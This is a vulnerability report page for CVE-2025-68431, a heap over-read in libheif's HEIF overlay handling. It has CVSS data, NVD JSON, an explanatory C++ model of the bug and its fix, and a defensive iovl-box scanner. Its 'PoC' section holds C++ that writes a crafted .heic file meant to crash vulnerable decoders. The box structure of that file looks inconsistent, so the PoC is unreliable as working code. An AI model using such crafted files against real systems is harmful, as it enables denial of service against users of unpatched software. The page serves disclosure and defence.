Security Vulnerability Report
CVE-2025-68431 CVSS 6.5 MEDIUM

CVE-2025-68431

Published: 2025-12-29 19:15:57
Last Modified: 2026-02-25 14:53:35

Description

libheif is an HEIF and AVIF file format decoder and encoder. Prior to version 1.21.0, a crafted HEIF that exercises the overlay image item path triggers a heap buffer over-read in `HeifPixelImage::overlay()`. The function computes a negative row length (likely from an unclipped overlay rectangle or invalid offsets), which then underflows when converted to `size_t` and is passed to `memcpy`, causing a very large read past the end of the source plane and a crash. Version 1.21.0 contains a patch. As a workaround, avoid decoding images using `iovl` overlay boxes.
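The description above names the bug class: a row length derived with signed arithmetic from an unclipped overlay rectangle goes negative, and the conversion to `size_t` that `memcpy` requires wraps it into a length near SIZE_MAX (the CWE-190 into CWE-125 chain the advisory lists). The C++ model below is an added example, not code from libheif or from the page's PoC; it shows the unchecked computation beside a clipped version. `Plane`, `Clip`, `unchecked_row_bytes`, `clip_overlay`, `overlay_clipped` and the 100x100 / 10x10 sample dimensions are assumed names and constructed data, not libheif's API or layout.

```cpp
#include <algorithm>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Simplified 8-bit single-plane image; stride equals width (assumed layout, not libheif's).
struct Plane {
    int width, height;
    std::vector<uint8_t> pixels;
    Plane(int w, int h, uint8_t fill) : width(w), height(h), pixels(size_t(w) * size_t(h), fill) {}
};

// Model of the vulnerable computation: the row length is derived with signed
// arithmetic and never checked for a negative result. With the overlay placed
// past the right edge (dx > canvas_w) the result is negative, and the cast to
// size_t that memcpy needs wraps it to a value near SIZE_MAX (CWE-190 -> CWE-125).
size_t unchecked_row_bytes(int canvas_w, int overlay_w, int dx) {
    int row_len = std::min(overlay_w, canvas_w - dx);  // negative when dx > canvas_w
    return static_cast<size_t>(row_len);               // wraps instead of failing
}

// Intersection of the overlay rectangle with the canvas, in both coordinate spaces.
struct Clip {
    int src_x, src_y;   // first overlay pixel to copy
    int dst_x, dst_y;   // where that pixel lands on the canvas
    int width, height;  // size of the copied region
};

// Hardened computation: clip the overlay rectangle to the canvas in 64-bit
// arithmetic (so extreme offsets cannot overflow int) and report "nothing to
// copy" instead of ever producing a negative length.
bool clip_overlay(int canvas_w, int canvas_h, int ov_w, int ov_h,
                  int64_t dx, int64_t dy, Clip& out) {
    if (canvas_w <= 0 || canvas_h <= 0 || ov_w <= 0 || ov_h <= 0) return false;
    int64_t x0 = std::max<int64_t>(dx, 0);
    int64_t y0 = std::max<int64_t>(dy, 0);
    int64_t x1 = std::min<int64_t>(dx + ov_w, canvas_w);
    int64_t y1 = std::min<int64_t>(dy + ov_h, canvas_h);
    if (x1 <= x0 || y1 <= y0) return false;  // overlay lies entirely off-canvas
    out.src_x = int(x0 - dx);  out.src_y = int(y0 - dy);
    out.dst_x = int(x0);       out.dst_y = int(y0);
    out.width = int(x1 - x0);  out.height = int(y1 - y0);
    return true;
}

// Copies the overlay onto the canvas row by row. Every memcpy length comes from
// the clip, so a crafted offset degrades to a no-op rather than an over-read.
// Returns the number of pixel bytes copied.
size_t overlay_clipped(Plane& canvas, const Plane& ov, int64_t dx, int64_t dy) {
    Clip c{};
    if (!clip_overlay(canvas.width, canvas.height, ov.width, ov.height, dx, dy, c)) return 0;
    size_t copied = 0;
    for (int y = 0; y < c.height; ++y) {
        const uint8_t* src = ov.pixels.data() + size_t(c.src_y + y) * size_t(ov.width) + size_t(c.src_x);
        uint8_t* dst = canvas.pixels.data() + size_t(c.dst_y + y) * size_t(canvas.width) + size_t(c.dst_x);
        std::memcpy(dst, src, size_t(c.width));
        copied += size_t(c.width);
    }
    return copied;
}

// Constructed scenario: 100x100 black canvas, 10x10 white overlay placed at (dx, dy).
size_t demo_bytes_copied(int64_t dx, int64_t dy) {
    Plane canvas(100, 100, 0), ov(10, 10, 255);
    return overlay_clipped(canvas, ov, dx, dy);
}

// Same scenario; reports whether canvas pixel (x, y) was painted by the overlay.
bool demo_pixel_set(int64_t dx, int64_t dy, int x, int y) {
    Plane canvas(100, 100, 0), ov(10, 10, 255);
    overlay_clipped(canvas, ov, dx, dy);
    return canvas.pixels[size_t(y) * 100 + size_t(x)] == 255;
}

int main() {
    // Overlay placed 50 px past the right edge: the unchecked length wraps to
    // roughly 2^64, while the clipped version copies nothing.
    size_t bad = unchecked_row_bytes(100, 10, 150);
    size_t good = demo_bytes_copied(150, 0);
    return (bad > (size_t(1) << 40) && good == 0) ? 0 : 1;
}
```

The design point is that the clip is computed once, in a wider type, and the copy loop only ever sees the clip's non-negative width; a decoder that instead derives each row's length from raw item offsets has to repeat the negative check at every `memcpy`, which is exactly the step that was missed here.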

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:struktur:libheif:*:*:*:*:*:*:*:* - VULNERABLE
libheif < 1.21.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C++
#include <cstdint>
#include <cstring>
#include <fstream>

// PoC for CVE-2025-68431: libheif heap buffer over-read in HeifPixelImage::overlay()
// This generates a malicious HEIF file with crafted overlay box that triggers the vulnerability

#pragma pack(1)
struct HEIFBox {
    uint32_t size;
    uint8_t type[4];  // 'ftyp', 'meta', 'iprp', 'iovl', etc.
    // box content follows
};

void create_malicious_heif(const char* filename) {
    std::ofstream f(filename, std::ios::binary);

    // ftyp box - file type
    HEIFBox ftyp = {0};
    ftyp.size = 16;
    memcpy(ftyp.type, "ftyp", 4);
    f.write(reinterpret_cast<char*>(&ftyp), sizeof(ftyp));  // 8-byte box header (the original wrote 12 bytes from this 8-byte struct)
    f.write("heic", 4);                                      // major brand
    uint32_t minor_version = 0;                              // fills the box out to its declared 16 bytes
    f.write(reinterpret_cast<char*>(&minor_version), 4);

    // meta box with crafted iovl overlay box
    // The iovl box contains invalid dimensions/offsets that cause
    // negative row_length calculation in overlay() function
    HEIFBox meta = {0};
    meta.size = 64;  // Crafted size
    memcpy(meta.type, "meta", 4);
    f.write(reinterpret_cast<char*>(&meta), 8);

    // iprp box (item properties)
    HEIFBox iprp = {0};
    iprp.size = 32;
    memcpy(iprp.type, "iprp", 4);
    f.write(reinterpret_cast<char*>(&iprp), 8);

    // iovl box - crafted overlay with invalid offsets
    HEIFBox iovl = {0};
    iovl.size = 24;
    memcpy(iovl.type, "iovl", 4);
    f.write(reinterpret_cast<char*>(&iovl), 8);

    // Overlay data with crafted dimensions to trigger negative row_length
    uint32_t overlay_data[] = {
        0xFFFFFFFF,  // Invalid width causing negative calculation
        0x00000000,  // Invalid height
        0x80000000,  // Negative offset that underflows when cast to size_t
        0x00000000
    };
    f.write(reinterpret_cast<char*>(overlay_data), sizeof(overlay_data));
    f.close();
}

int main() {
    create_malicious_heif("CVE-2025-68431.heic");
    return 0;
}
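The workaround in the description (do not decode images that use `iovl` overlay boxes) needs a way to tell, before the file reaches a vulnerable libheif, whether it declares such an item. The scanner below is an added example, not code from the page or from libheif: it walks the ISOBMFF box tree into `meta` > `iinf` > `infe`, counts `infe` entries whose `item_type` is `iovl`, and refuses files whose box sizes overrun their parent. `count_iovl_items`, `scan_boxes`, `sample_heif`, `scan_truncated_sample` and the embedded sample files are assumed names and constructed data; the samples carry only enough box structure to be scanned, not real image payloads.

```cpp
#include <cstdint>
#include <cstring>
#include <string>
#include <vector>

// Bounds-checked big-endian u32 read.
static bool rd32(const std::vector<uint8_t>& b, size_t off, uint32_t& v) {
    if (off + 4 > b.size()) return false;
    v = (uint32_t(b[off]) << 24) | (uint32_t(b[off + 1]) << 16) |
        (uint32_t(b[off + 2]) << 8) | uint32_t(b[off + 3]);
    return true;
}

// Walks the boxes in [begin, end), descending into meta -> iinf -> infe, and
// counts infe entries whose item_type is 'iovl'. Returns false on a box that
// overruns its parent or on a header that does not fit.
static bool scan_boxes(const std::vector<uint8_t>& b, size_t begin, size_t end, int& iovl) {
    size_t off = begin;
    while (off < end) {
        uint32_t size32;
        if (off + 8 > end || !rd32(b, off, size32)) return false;
        std::string type(reinterpret_cast<const char*>(&b[off + 4]), 4);
        uint64_t size = size32;
        size_t hdr = 8;
        if (size32 == 1) {                       // 64-bit largesize follows the type
            uint32_t hi, lo;
            if (!rd32(b, off + 8, hi) || !rd32(b, off + 12, lo)) return false;
            size = (uint64_t(hi) << 32) | lo;
            hdr = 16;
        } else if (size32 == 0) {                // box extends to the end of its parent
            size = end - off;
        }
        if (size < hdr || size > end - off) return false;  // box overruns its container
        size_t body = off + hdr, box_end = off + size_t(size);
        if (type == "meta") {                    // FullBox: 4 bytes version/flags, then children
            if (body + 4 > box_end) return false;
            if (!scan_boxes(b, body + 4, box_end, iovl)) return false;
        } else if (type == "iinf") {             // FullBox + entry_count (u16 in v0, u32 otherwise)
            if (body + 4 > box_end) return false;
            size_t skip = 4 + (b[body] == 0 ? 2 : 4);
            if (body + skip > box_end) return false;
            if (!scan_boxes(b, body + skip, box_end, iovl)) return false;
        } else if (type == "infe") {             // FullBox; item_type exists from version 2 on
            if (body + 4 > box_end) return false;
            uint8_t version = b[body];
            size_t type_off = body + 4 + (version >= 3 ? 4 : 2) + 2;  // after item_ID, item_protection_index
            if (version >= 2 && type_off + 4 <= box_end && std::memcmp(&b[type_off], "iovl", 4) == 0) ++iovl;
        }
        off = box_end;
    }
    return true;
}

// Number of 'iovl' items the file declares, or -1 if the box tree is malformed
// (a malformed tree is itself grounds to refuse the file).
int count_iovl_items(const std::vector<uint8_t>& file) {
    int n = 0;
    return scan_boxes(file, 0, file.size(), n) ? n : -1;
}

// ---- constructed sample files: just enough box structure to scan, no real image data ----
static void put32(std::vector<uint8_t>& v, uint32_t x) {
    v.push_back(uint8_t(x >> 24)); v.push_back(uint8_t(x >> 16)); v.push_back(uint8_t(x >> 8)); v.push_back(uint8_t(x));
}
static void append(std::vector<uint8_t>& v, const std::vector<uint8_t>& more) { v.insert(v.end(), more.begin(), more.end()); }
static std::vector<uint8_t> box(const char* type, const std::vector<uint8_t>& payload) {
    std::vector<uint8_t> out;
    put32(out, uint32_t(8 + payload.size()));
    out.insert(out.end(), type, type + 4);
    append(out, payload);
    return out;
}
// infe version 2: version/flags, item_ID (u16), item_protection_index (u16), item_type (4cc), empty item_name
static std::vector<uint8_t> infe_v2(uint16_t id, const char* item_type) {
    std::vector<uint8_t> p = {2, 0, 0, 0, uint8_t(id >> 8), uint8_t(id), 0, 0};
    p.insert(p.end(), item_type, item_type + 4);
    p.push_back(0);
    return box("infe", p);
}
// ftyp + meta(iinf(infe hvc1 [, infe iovl]))
std::vector<uint8_t> sample_heif(bool with_overlay) {
    std::vector<uint8_t> iinf = {0, 0, 0, 0, 0, uint8_t(with_overlay ? 2 : 1)};  // v0, flags, entry_count
    append(iinf, infe_v2(1, "hvc1"));
    if (with_overlay) append(iinf, infe_v2(2, "iovl"));
    std::vector<uint8_t> meta = {0, 0, 0, 0};  // version 0, flags 0
    append(meta, box("iinf", iinf));
    std::vector<uint8_t> file = box("ftyp", {'h', 'e', 'i', 'c', 0, 0, 0, 0});
    append(file, box("meta", meta));
    return file;
}
// The overlay sample cut short by 4 bytes: the meta box now overruns the file.
int scan_truncated_sample() {
    std::vector<uint8_t> f = sample_heif(true);
    f.resize(f.size() - 4);
    return count_iovl_items(f);
}

int main() {
    return (count_iovl_items(sample_heif(true)) == 1 && count_iovl_items(sample_heif(false)) == 0) ? 0 : 1;
}
```

A gateway that runs this ahead of an unpatched libheif would reject anything returning a non-zero value; once 1.21.0 is deployed the check can be dropped, since the advisory records the fix in that release.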

References

https://github.com/strukturag/libheif/commit/b8c12a7b70f46c9516711a988483bed377b78d46 - Patch
https://github.com/strukturag/libheif/releases/tag/v1.21.0 - Product, Release Notes
https://github.com/strukturag/libheif/security/advisories/GHSA-j87x-4gmq-cqfq - Exploit, Patch, Vendor Advisory

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68431", "sourceIdentifier": "[email protected]", "published": "2025-12-29T19:15:56.933", "lastModified": "2026-02-25T14:53:34.747", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "libheif is an HEIF and AVIF file format decoder and encoder. Prior to version 1.21.0, a crafted HEIF that exercises the overlay image item path triggers a heap buffer over-read in `HeifPixelImage::overlay()`. The function computes a negative row length (likely from an unclipped overlay rectangle or invalid offsets), which then underflows when converted to `size_t` and is passed to `memcpy`, causing a very large read past the end of the source plane and a crash. Version 1.21.0 contains a patch. As a workaround, avoid decoding images using `iovl` overlay boxes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, 
"cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:struktur:libheif:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.21.0", "matchCriteriaId": "BBD4D6C6-A38E-4C2C-AB9D-F82441BE2D4F"}]}]}], "references": [{"url": "https://github.com/strukturag/libheif/commit/b8c12a7b70f46c9516711a988483bed377b78d46", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/strukturag/libheif/releases/tag/v1.21.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/strukturag/libheif/security/advisories/GHSA-j87x-4gmq-cqfq", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}